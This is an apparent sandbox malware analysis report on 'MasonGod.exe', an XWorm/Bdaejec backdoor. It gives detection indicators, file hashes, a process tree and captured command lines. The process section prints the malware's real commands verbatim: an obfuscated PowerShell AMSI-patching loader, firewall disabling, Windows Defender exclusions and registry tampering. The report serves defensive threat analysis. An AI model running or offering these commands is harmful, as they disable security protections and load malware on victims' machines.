File name:

MasonGod.exe

Full analysis: https://app.any.run/tasks/52814ff2-7d6e-4086-acbc-e1dc0f95719c
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Malware Trends Tracker     >>>
Analysis date: May 26, 2025, 01:14:45
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
auto-sch
bdaejec
backdoor
auto-startup
remote
xworm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

DA5E3B74FFF72F0E14F29E5B5007AD59

SHA1:

AA89BE5706E274878D0304F931B36F605E7A7B19

SHA256:

F258E1FAA4CBB6C3976D2E99E55F9A97DA51D197F9FD9BA58553C2DD2541999E

SSDEEP:

12288:YFMspv4RMSrzum+3KLX2+E6esjaZueABFLC+:3spviMuzn+3n+E2jkuBFL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Known privilege escalation attack

      • dllhost.exe (PID: 5244)

    • Adds path to the Windows Defender exclusion list

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)

    • Changes powershell execution policy (Bypass)

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)

    • Changes Windows Defender settings

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • cmd.exe (PID: 4120)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4400)
      • powershell.exe (PID: 6752)
      • powershell.exe (PID: 332)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 1240)

    • Adds process to the Windows Defender exclusion list

      • MasonGod.exe (PID: 6388)

    • Changes the autorun value in the registry

      • wlanext.exe (PID: 4068)

    • BDAEJEC has been detected

      • iyMbXS.exe (PID: 6632)

    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 5756)

    • Application was injected by another process

      • dllhost.exe (PID: 6972)

    • Runs injected code in another process

      • powershell.exe (PID: 340)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 340)

    • Changes settings for real-time protection

      • powershell.exe (PID: 4868)

    • Create files in the Startup directory

      • x69s.exe (PID: 6760)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7276)

    • XWORM has been detected (SURICATA)

      • x69s.exe (PID: 6760)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 6268)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7964)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 3024)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 8176)

  • SUSPICIOUS

    • Reads the date of Windows installation

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)

    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • MasonGod.exe (PID: 5376)

    • Reads security settings of Internet Explorer

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69..exe (PID: 7156)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 5956)
      • mshta.exe (PID: 1852)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 5956)
      • MasonGod.exe (PID: 6388)
      • x69..exe (PID: 7156)

    • The executable file from the user directory is run by the CMD process

      • MasonGod.exe (PID: 6388)

    • Uses TASKKILL.EXE to kill process

      • mshta.exe (PID: 1852)

    • Executes as Windows Service

      • VSSVC.exe (PID: 5640)

    • Starts POWERSHELL.EXE for commands execution

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • cmd.exe (PID: 4120)

    • Script adds exclusion path to Windows Defender

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)

    • Script adds exclusion process to Windows Defender

      • MasonGod.exe (PID: 6388)

    • The process executes via Task Scheduler

      • wlanext.exe (PID: 4068)
      • powershell.exe (PID: 340)

    • Executing commands from a ".bat" file

      • MasonGod.exe (PID: 6388)
      • x69..exe (PID: 7156)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 4220)

    • Executable content was dropped or overwritten

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • x69Install.exe (PID: 4740)

    • Connects to unusual port

      • iyMbXS.exe (PID: 6632)
      • x69s.exe (PID: 6760)

    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 340)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 4120)

    • Script disables Windows Defender's behavior monitoring

      • cmd.exe (PID: 4120)

    • Contacting a server suspected of hosting an CnC

      • x69s.exe (PID: 6760)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 4120)

    • Uses REG/REGEDIT.EXE to modify registry

      • powershell.exe (PID: 7980)
      • powershell.exe (PID: 8064)
      • cmd.exe (PID: 4120)

    • Uses NETSH.EXE to change the status of the firewall

      • powershell.exe (PID: 208)

    • Modifies existing scheduled task

      • schtasks.exe (PID: 780)
      • schtasks.exe (PID: 7804)
      • schtasks.exe (PID: 4024)
      • schtasks.exe (PID: 6264)
      • schtasks.exe (PID: 7680)

  • INFO

    • Checks supported languages

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69Install.exe (PID: 4740)
      • x69..exe (PID: 7156)
      • MpCmdRun.exe (PID: 5756)
      • x69s.exe (PID: 6760)
      • x69s.exe (PID: 7824)

    • Reads the computer name

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69Install.exe (PID: 4740)
      • x69..exe (PID: 7156)
      • MpCmdRun.exe (PID: 5756)
      • x69s.exe (PID: 6760)
      • x69s.exe (PID: 7824)

    • Reads the machine GUID from the registry

      • MasonGod.exe (PID: 5376)
      • wlanext.exe (PID: 4068)
      • x69Install.exe (PID: 4740)
      • x69s.exe (PID: 6760)
      • x69s.exe (PID: 7824)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 5956)
      • mshta.exe (PID: 1852)

    • Disables trace logs

      • cmstp.exe (PID: 4400)

    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 4400)

    • Process checks computer location settings

      • MasonGod.exe (PID: 5376)
      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • x69..exe (PID: 7156)

    • Creates files in the program directory

      • dllhost.exe (PID: 5244)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4400)
      • powershell.exe (PID: 6752)
      • powershell.exe (PID: 332)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 1240)
      • powershell.exe (PID: 4868)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4400)
      • powershell.exe (PID: 6752)
      • powershell.exe (PID: 332)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 1240)
      • powershell.exe (PID: 4868)

    • Creates files or folders in the user directory

      • MasonGod.exe (PID: 6388)
      • wlanext.exe (PID: 4068)
      • iyMbXS.exe (PID: 6632)
      • x69s.exe (PID: 6760)

    • Create files in a temporary directory

      • MasonGod.exe (PID: 6388)
      • x69Install.exe (PID: 4740)
      • iyMbXS.exe (PID: 6632)
      • x69..exe (PID: 7156)
      • MpCmdRun.exe (PID: 5756)

    • Auto-launch of the file from Registry key

      • wlanext.exe (PID: 4068)

    • Uses Task Scheduler to autorun other applications (AUTOMATE)

      • wlanext.exe (PID: 4068)

    • Checks proxy server information

      • iyMbXS.exe (PID: 6632)

    • Manual execution by a user

      • x69Install.exe (PID: 3784)
      • x69..exe (PID: 1388)
      • x69s.exe (PID: 7824)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 340)

    • Auto-launch of the file from Startup directory

      • x69s.exe (PID: 6760)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:26 00:06:26+00:00
ImageFileCharacteristics: Executable
PEType: PE32
LinkerVersion: 8
CodeSize: 446464
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0x6efd6
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 1.0.0.0
InternalName: injection.exe
LegalCopyright:
OriginalFileName: injection.exe
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
231
Monitored processes
100
Malicious processes
9
Suspicious processes
11

Behavior graph

Click at the process to see the details
start masongod.exe no specs cmstp.exe no specs CMSTPLUA sppextcomobj.exe no specs slui.exe mshta.exe no specs cmd.exe no specs conhost.exe no specs masongod.exe mshta.exe no specs taskkill.exe no specs conhost.exe no specs SPPSurrogate no specs vssvc.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wlanext.exe cmd.exe no specs conhost.exe no specs timeout.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs x69install.exe powershell.exe no specs conhost.exe no specs iymbxs.exe powershell.exe no specs conhost.exe no specs x69install.exe no specs schtasks.exe no specs conhost.exe no specs x69..exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs x69..exe no specs mpcmdrun.exe no specs schtasks.exe no specs conhost.exe no specs #XWORM x69s.exe powershell.exe no specs dllhost.exe x69s.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs svchost.exe powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs slui.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs reg.exe no specs powershell.exe no specs reg.exe no specs powershell.exe no specs netsh.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208powershell.exe -command "netsh advfirewall set allprofiles state off"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
332"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\x69Install.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewlanext.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
340"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:EPFbuMUBkVtw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TcRgCfZxWkxzZI,[Parameter(Position=1)][Type]$klENkFJZuO)$kzWHiJIuIsm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'','C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+'la'+'s'+'s',[MulticastDelegate]);$kzWHiJIuIsm.DefineConstructor(''+'R'+''+'T'+'Sp'+'e'+''+'c'+'ia'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,'+'P'+''+'u'+''+[Char](98)+''+'l'+'ic',[Reflection.CallingConventions]::Standard,$TcRgCfZxWkxzZI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$kzWHiJIuIsm.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+'l'+'o'+'t'+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$klENkFJZuO,$TcRgCfZxWkxzZI).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $kzWHiJIuIsm.CreateType();}$FYcrjRkpoWGmb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+'m'+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+'W'+'i'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'et'+[Char](104)+''+[Char](111)+'ds');$LwCoCKVrrgsLwP=$FYcrjRkpoWGmb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'lic,'+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zCGeVfVGByoZXUnbszR=EPFbuMUBkVtw @([String])([IntPtr]);$GRFdfBOUoavgmiQoZpuARe=EPFbuMUBkVtw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SmdddBIYiFb=$FYcrjRkpoWGmb.GetMethod(''+'G'+''+'e'+''+'t'+''+'M'+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$pohxnefHKvhkqO=$LwCoCKVrrgsLwP.Invoke($Null,@([Object]$SmdddBIYiFb,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$xBlSXPaEcWfFclPOg=$LwCoCKVrrgsLwP.Invoke($Null,@([Object]$SmdddBIYiFb,[Object]('Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$VzMvrft=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pohxnefHKvhkqO,$zCGeVfVGByoZXUnbszR).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$QCVydxevpDTqiVxYl=$LwCoCKVrrgsLwP.Invoke($Null,@([Object]$VzMvrft,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+'a'+'n'+'B'+'u'+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$InCptbzBNz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xBlSXPaEcWfFclPOg,$GRFdfBOUoavgmiQoZpuARe).Invoke($QCVydxevpDTqiVxYl,[uint32]8,4,[ref]$InCptbzBNz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QCVydxevpDTqiVxYl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xBlSXPaEcWfFclPOg,$GRFdfBOUoavgmiQoZpuARe).Invoke($QCVydxevpDTqiVxYl,[uint32]8,0x20,[ref]$InCptbzBNz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9s'+'t'+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
352\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
780schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /DisableC:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Roaming\x69..exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewlanext.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
900reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
960\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
968\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
130 981
Read events
130 888
Write events
85
Delete events
8

Modification events

(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4400) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(5244) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:(5956) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5956) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
6
Suspicious files
5
Text files
51
Unknown types
0

Dropped files

PID
Process
Filename
Type
5376MasonGod.exeC:\Windows\Temp\ydnhwr1y.inftext
MD5:31037F84E1B357F1B5B236998FAC2A80
SHA256:92F59D57EE00005BDF845366330BE857D5175C94AF18D480A4E2B3FD3AC1CF4C
4400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hybwqikq.llm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6752powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2s2jfg1a.fiy.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4400powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:AC9B62B953350C9F16CE003945F3238A
SHA256:B7408FF76FA30857D9309F95E518FCF46184E404F1BDE435B8200B966367982E
4400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_n0zrrrt1.4pi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6752powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ndyvf1x1.cnk.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4740x69Install.exeC:\Users\admin\AppData\Local\Temp\iyMbXS.exeexecutable
MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
SHA256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
340powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_wjljrbgc.xcj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
332powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nlkqxnhl.gre.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
